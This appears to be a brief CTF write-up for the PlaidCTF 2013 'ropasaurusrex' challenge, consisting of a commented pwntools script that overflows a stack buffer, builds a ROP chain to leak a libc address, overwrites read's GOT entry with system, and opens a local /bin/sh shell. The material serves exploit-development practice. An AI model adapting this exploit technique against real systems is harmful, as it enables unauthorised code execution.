[PlaidCTF 2013] ropasaurusrex

ii4gsp 2020. 3. 13. 19:12
from pwn import *

p = process('./ropasaurusrex')
e = ELF('./ropasaurusrex')
libc = e.libc

# pop esi; pop edi; pop ebp; ret gadget: discards the three arguments after each call
pppr = 0x080484b6

# Stage 1: overflow the 0x88-byte stack buffer (plus saved ebp) and chain:
#   write(1, got['read'], 4)  -> leak the runtime address of read
#   read(0, bss, 8)           -> place "/bin/sh\x00" in .bss
#   read(0, got['read'], 4)   -> replace the GOT entry of read with system
#   read@plt                  -> now jumps to system(bss) == system("/bin/sh")
payload = b''
payload += b'\x90' * (0x88 + 4)
payload += p32(e.plt['write']) + p32(pppr) + p32(1) + p32(e.got['read']) + p32(4)
payload += p32(e.plt['read']) + p32(pppr) + p32(0) + p32(e.bss()) + p32(8)
payload += p32(e.plt['read']) + p32(pppr) + p32(0) + p32(e.got['read']) + p32(4)
payload += p32(e.plt['read']) + b'\x90' * 4 + p32(e.bss())  # fake return address, then the argument

p.sendline(payload)

# Stage 2: compute the libc base from the leaked read address
leak = u32(p.recv(4))
libc_base = leak - libc.symbols['read']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))  # unused here; the string is written to .bss instead

# Data consumed by the two reads above: 8 bytes into .bss, then 4 bytes into the GOT entry
payload = b''
payload += b'/bin/sh\x00'
payload += p32(system)

p.sendline(payload)

p.interactive()